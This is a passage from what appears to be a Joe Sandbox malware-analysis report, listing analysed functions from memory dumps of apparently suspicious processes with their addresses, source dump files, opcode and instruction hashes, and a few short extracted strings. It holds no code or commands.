                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dc4d447af2bf8785ac4518e2c2d372c246a05c0e8f0946e02d864a39f0d365be
                                                                                                                                  • Instruction ID: 200c1b044253f55ec43863bb9f8fabd9274c9a36694437a321b14625001f9328
                                                                                                                                  • Opcode Fuzzy Hash: dc4d447af2bf8785ac4518e2c2d372c246a05c0e8f0946e02d864a39f0d365be
                                                                                                                                  • Instruction Fuzzy Hash: 5E21F920B1991D0FE798F76C946E67976C3EF98325F8101BEE40DC32EBDD54AC418285
                                                                                                                                  Function 00007FFD9BAC0C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f455cc9b642eea9e97c8f8da7a1634e13380653e60bfd8938a0fd1dd7ed1faaf
                                                                                                                                  • Instruction ID: 1cbdb995dcb455195491eb4470f842b1804416303b91257a6e9752c65a140181
                                                                                                                                  • Opcode Fuzzy Hash: f455cc9b642eea9e97c8f8da7a1634e13380653e60bfd8938a0fd1dd7ed1faaf
                                                                                                                                  • Instruction Fuzzy Hash: 7511E531A0E28C8FE721EBA4C8600EC7FB0EF02710F0642F7C054DB2A3D93426458744
                                                                                                                                  Function 00007FFD9BAC0C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c3660d3c37f787c0b312d1ee0fd005108dff765e3ffb4bc05ca05326cb48ea25
                                                                                                                                  • Instruction ID: 3273520c20ed3635ab087cd509f4c2915f12884acdb6ed6197e74e36024bde1f
                                                                                                                                  • Opcode Fuzzy Hash: c3660d3c37f787c0b312d1ee0fd005108dff765e3ffb4bc05ca05326cb48ea25
                                                                                                                                  • Instruction Fuzzy Hash: 4B019235A0E38D9FE721EBA4C8505AC7FB0EF02710F1641E7D454DB2A3D9786645C784
                                                                                                                                  Function 00007FFD9BAC0C50 Relevance: .0, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 952fa6fe841e83f7d9cfbcb927340a1b532e98794c1d66217d0915da76cbda98
                                                                                                                                  • Instruction ID: 072ae907b2d9626580e872033c6ef67291d916173e6c8e1a384cbfd7af3b099e
                                                                                                                                  • Opcode Fuzzy Hash: 952fa6fe841e83f7d9cfbcb927340a1b532e98794c1d66217d0915da76cbda98
                                                                                                                                  • Instruction Fuzzy Hash: E501BC30A0E3899FEB21EBA488604AC7FB0EF02B00F1542E7D454DB2A3D9786A448744
                                                                                                                                  Function 00007FFD9BAC0B77 Relevance: .0, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6105db3d1276f9be6e242e98b429d1c618792c8f58fc7f4dd2f29a386901320e
                                                                                                                                  • Instruction ID: a8f1a18d76980bd8f702742935d16312514e2a97852b11af9b9d7975c2384073
                                                                                                                                  • Opcode Fuzzy Hash: 6105db3d1276f9be6e242e98b429d1c618792c8f58fc7f4dd2f29a386901320e
                                                                                                                                  • Instruction Fuzzy Hash: AFF0A03925EA49CFC742EB3CC8A54D4BB60EF02204B8A02EAD089CB5A2D315585ECB41
                                                                                                                                  Function 00007FFD9BAC5906 Relevance: .0, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction ID: 6ca5f5c43e8eda87471213f3deabf200b41944309b8eb413444955ffdf97615b
                                                                                                                                  • Opcode Fuzzy Hash: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction Fuzzy Hash: D9E01230F0D11E8AF774B755D8607B962619F94300F5210B5D44E933E2CDB86F414B44
                                                                                                                                  Function 00007FFD9BAC12E8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction ID: 168482db4fb0d634110e7c1714969c5c40b87b4ad03f81404eb8e2e14a5f6f28
                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: 7EC04C3455180D8FCA58FB69C89592477E0FB19215BD60090E409C7175E669DDD5CB41
                                                                                                                                  Function 00007FFD9BAC460A Relevance: .0, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: def32627462d3ca479b4d2356f73b847a5739bbabf6e23f16856ccfc0d55082a
                                                                                                                                  • Instruction ID: 762260e30ddad3a4b1841a4ddddc67c58d88896a255871cef5f461bc75f26095
                                                                                                                                  • Opcode Fuzzy Hash: def32627462d3ca479b4d2356f73b847a5739bbabf6e23f16856ccfc0d55082a
                                                                                                                                  • Instruction Fuzzy Hash: 7DC08C01F5C81A02F21922080432B7D04024F4431CF840034F00EC73CECE1C5A0202C6
                                                                                                                                  Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction ID: 665c8a23fa611e7f46ad90d898768c3cc87205325e92b1b1573b62c66661b746
                                                                                                                                  • Opcode Fuzzy Hash: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction Fuzzy Hash: 93B01200D5740F00E87433FA085207870405B44100FC20170D40C8129198CF12940246

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00007FFD9BAC09B0 Relevance: 5.2, Strings: 4, Instructions: 193COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: c9$!k9$"s9$#{9
                                                                                                                                  • API String ID: 0-1692736845
                                                                                                                                  • Opcode ID: 2560d99f7aadee0768160d3826f84225cd5e3117e9cca7b1c82e99ed3d0c3aa1
                                                                                                                                  • Instruction ID: 962e4899e7d570850169bb59c106cc96c19b9b119790d2ccf6a32686fe76ecc3
                                                                                                                                  • Opcode Fuzzy Hash: 2560d99f7aadee0768160d3826f84225cd5e3117e9cca7b1c82e99ed3d0c3aa1
                                                                                                                                  • Instruction Fuzzy Hash: CC514C06B1A46A45E33977FD78219FD6B449FA923FB0843B7F85E8D0D74C486085C2E9

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFD9BAB0566 Relevance: 2.0, Instructions: 2033COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cc885fe64a7126d72f63f8c56b40ce37906f54ec28ba8a881950691794bd88c5
                                                                                                                                  • Instruction ID: ae0ce93537043912c7429a6eea9fe3bd492907e1563910fafc0f401cf859c1a8
                                                                                                                                  • Opcode Fuzzy Hash: cc885fe64a7126d72f63f8c56b40ce37906f54ec28ba8a881950691794bd88c5
                                                                                                                                  • Instruction Fuzzy Hash: 64E2C331B1991E4FEBA8EB6884B17B87392FFA8350F1541B9D01DC72D6DE64BD418B80
                                                                                                                                  Function 00007FFD9BAA0D74 Relevance: .3, Instructions: 263COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f8bc2f05d482cd076381dde097c293993e46d9098a71265d6deddd655ee7a12b
                                                                                                                                  • Instruction ID: 32e38260d048b2ea9616b81e075e7438bc3149f63262ecad2a6b6c79abc0554f
                                                                                                                                  • Opcode Fuzzy Hash: f8bc2f05d482cd076381dde097c293993e46d9098a71265d6deddd655ee7a12b
                                                                                                                                  • Instruction Fuzzy Hash: 4991B176A18A8D4FE798EB6888657A97FE1FF99314F4101BEE049D72D6CBB81805C700
                                                                                                                                  Function 00007FFD9BAA0B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: c9$!k9$"s9
                                                                                                                                  • API String ID: 0-3426396564
                                                                                                                                  • Opcode ID: 4470e08967ed613b296afce63408d3fd13e033ffe4afc30e5f06ef80efccf24c
                                                                                                                                  • Instruction ID: 686306be4a690df05e0852d15206d5b05897dfacf84590a8f7bf2564703c99ef
                                                                                                                                  • Opcode Fuzzy Hash: 4470e08967ed613b296afce63408d3fd13e033ffe4afc30e5f06ef80efccf24c
                                                                                                                                  • Instruction Fuzzy Hash: F801F73A3299568FC611AB3EA4905D8BB50EAC2135B8601B7D144CB1A1E2101C9EC7E0
                                                                                                                                  Function 00007FFD9BAD3C69 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: M
                                                                                                                                  • API String ID: 0-3664761504
                                                                                                                                  • Opcode ID: ab502c4148fea83b0877ed1d7bfa351d09c4c2f0612dbe10839e17ac564868cf
                                                                                                                                  • Instruction ID: 43756515a313015f382594f09591aab402b1257d4970a5cc334c2fbd33dd57b1
                                                                                                                                  • Opcode Fuzzy Hash: ab502c4148fea83b0877ed1d7bfa351d09c4c2f0612dbe10839e17ac564868cf
                                                                                                                                  • Instruction Fuzzy Hash: A1E06D7160E7C44FC71AAA348869454BFA0EF6720178A42EEC045CF1E3EA2D8889C701
                                                                                                                                  Function 00007FFD9BAC9329 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 13c6aa1613b8499ab9238997d5505ee02ed6a470e895d757e21e7158a1fdb2ff
                                                                                                                                  • Instruction ID: fccb1b65466546408b31dce473351bce6f264d883f64bf02282f478a91c1dddb
                                                                                                                                  • Opcode Fuzzy Hash: 13c6aa1613b8499ab9238997d5505ee02ed6a470e895d757e21e7158a1fdb2ff
                                                                                                                                  • Instruction Fuzzy Hash: 62E0126154E3C44FCB1AEB7488698943FA0AE6B21078B40EEC186CF2B3E62DC949C701
                                                                                                                                  Function 00007FFD9BAC94D9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 16bedd60f9927a11fc93583c22fba363b9671931c9460c4d41c5cbc5bcca993f
                                                                                                                                  • Instruction ID: 1f362d40cfaea4c412d5ecdd6d446c27ddbaf54b2d03c6cf2260a80495f5ef28
                                                                                                                                  • Opcode Fuzzy Hash: 16bedd60f9927a11fc93583c22fba363b9671931c9460c4d41c5cbc5bcca993f
                                                                                                                                  • Instruction Fuzzy Hash: F9E01A7154E7C44FCB16EB74886A9547FA0AE6721078B40EFC189CF1B3E62D8949C701
                                                                                                                                  Function 00007FFD9BAB3B09 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 6f36be209ce5efda404b3bf955add50de06e553d9f253d47534f80f91e67eea1
                                                                                                                                  • Instruction ID: d90636edc773da61f91f4e11058c538d233ffe8f65c85afe85d82fcd2458245b
                                                                                                                                  • Opcode Fuzzy Hash: 6f36be209ce5efda404b3bf955add50de06e553d9f253d47534f80f91e67eea1
                                                                                                                                  • Instruction Fuzzy Hash: 1BE01A6154F7C44FCB56EB74886A9447FA0AE6721178B41EFC185CF1B3E62D8949C701
                                                                                                                                  Function 00007FFD9BAD8D18 Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 472ba53faf67dfb69290e881858baaaec577cfd24926faefcd904479de10c280
                                                                                                                                  • Instruction ID: 28551392011a71b4471b29064ef00b66f8698f2cbeb2de8c8eef42fc08b40698
                                                                                                                                  • Opcode Fuzzy Hash: 472ba53faf67dfb69290e881858baaaec577cfd24926faefcd904479de10c280
                                                                                                                                  • Instruction Fuzzy Hash: A0D05E705461848FCB08EA748069C647F91DE6A30038640ECD10ACB2B6EA2A8945C700
                                                                                                                                  Function 00007FFD9BAB0F40 Relevance: .8, Instructions: 787COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ee78ab63fdf52ddf3e3e2032bb9054a081abdae79d93b2d96945c286430a2256
                                                                                                                                  • Instruction ID: 8851ad872fc4fd03e9fe41c5be08801ca27e84e9c8dfa3391cd01536242be659
                                                                                                                                  • Opcode Fuzzy Hash: ee78ab63fdf52ddf3e3e2032bb9054a081abdae79d93b2d96945c286430a2256
                                                                                                                                  • Instruction Fuzzy Hash: 8A42B131B1991E4FEBA8EB5884A17B87392FFA8350F1541B9D01DC32D7DE68BD468B40
                                                                                                                                  Function 00007FFD9BADBAD5 Relevance: .2, Instructions: 194COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8da4b88211055e334d942bbe142f37cc67ad8af517845732530432235287a1f1
                                                                                                                                  • Instruction ID: c04801f9538d04efad12876fca8bbdd5a38feb68aabe4dbacfe82710cb7f8e46
                                                                                                                                  • Opcode Fuzzy Hash: 8da4b88211055e334d942bbe142f37cc67ad8af517845732530432235287a1f1
                                                                                                                                  • Instruction Fuzzy Hash: F851F631B19A5E4FEB68EB5884A57A87391FFD8310F86437AD00DCB1E6DE686D41C380
                                                                                                                                  Function 00007FFD9BAC95A7 Relevance: .2, Instructions: 194COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 21b942a1c2e3f51319b15c55d489b701c73e1cfd8dca915d6d997919be114383
                                                                                                                                  • Instruction ID: 5ae5e780eabd8b0b87420b00648a477aa85aa46814d12c3f55d500c86c1b3686
                                                                                                                                  • Opcode Fuzzy Hash: 21b942a1c2e3f51319b15c55d489b701c73e1cfd8dca915d6d997919be114383
                                                                                                                                  • Instruction Fuzzy Hash: 1551A130B1980E4FDB59FB69C464AA977E2FF98314B514279E01DC72D6CF38A941CB80
                                                                                                                                  Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 156COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c24c94802cda61a94cf6d32425f95b5ae99d1bffc931b5eea37be12f8c36ec8e
                                                                                                                                  • Instruction ID: a2b0a06e5ba1612811ca137011d1e5018bc4303f8ccbbcad2c47421e8cfbb57c
                                                                                                                                  • Opcode Fuzzy Hash: c24c94802cda61a94cf6d32425f95b5ae99d1bffc931b5eea37be12f8c36ec8e
                                                                                                                                  • Instruction Fuzzy Hash: B3410712B0C5190AE368F7AC64A5AF97781DF9833AF4445BBE44ECB1D7DE186C41C284
                                                                                                                                  Function 00007FFD9BAD30B8 Relevance: .1, Instructions: 130COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 79684dcb15c81abbd261c74f96577f68160e24152653c44a064c05e2e0320699
                                                                                                                                  • Instruction ID: 0da207ae360eea8935083088d553a92875b8c3f3e0fd2ca6df97b5bf33654eab
                                                                                                                                  • Opcode Fuzzy Hash: 79684dcb15c81abbd261c74f96577f68160e24152653c44a064c05e2e0320699
                                                                                                                                  • Instruction Fuzzy Hash: 1F41C132B09A1D4FEB64EB58D8A4AE973E2EB98320F05427BD40DC72D5DE786945C780
                                                                                                                                  Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a38f0f56ea82cc10b5420843e6f5aeab71a6999403b7f326bba4df93bf2997c8
                                                                                                                                  • Instruction ID: dcede70c81ed9e9555598476dfda89c2b1f0810f152eddbeda229ee1dc04cb54
                                                                                                                                  • Opcode Fuzzy Hash: a38f0f56ea82cc10b5420843e6f5aeab71a6999403b7f326bba4df93bf2997c8
                                                                                                                                  • Instruction Fuzzy Hash: F8313936B0E24D8EE731EBA888611EC7B61EF41725F0641B7D05CCB1D3D9782689C765
                                                                                                                                  Function 00007FFD9BAA0998 Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5ba8d23f3a285f1ec139348e86858482c11d10aa14a38592c3c6d00d7695778b
                                                                                                                                  • Instruction ID: 925ee1c982671daf55532d4d5121612ae63939c7403ef06d5f6190a24fbc153d
                                                                                                                                  • Opcode Fuzzy Hash: 5ba8d23f3a285f1ec139348e86858482c11d10aa14a38592c3c6d00d7695778b
                                                                                                                                  • Instruction Fuzzy Hash: 6E21F620B1991D0FE7A8F76C986AA7972C3EF9C325F4140BEE40EC32E7DD54AC418295
                                                                                                                                  Function 00007FFD9BACF085 Relevance: .1, Instructions: 86COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 53cb363bd71b351f5864b0dc12745a4495376562cc90c4be70a4716cd29d070b
                                                                                                                                  • Instruction ID: 85cd109f00dcd8ade8b37935cfa4be4649a57ae20b4f8559171ad2c7ab42758c
                                                                                                                                  • Opcode Fuzzy Hash: 53cb363bd71b351f5864b0dc12745a4495376562cc90c4be70a4716cd29d070b
                                                                                                                                  • Instruction Fuzzy Hash: 81113F31F0DA4D0FCB99E76C58650B47BD1EFD9210F4901BBD44DC31A2ED699D468341
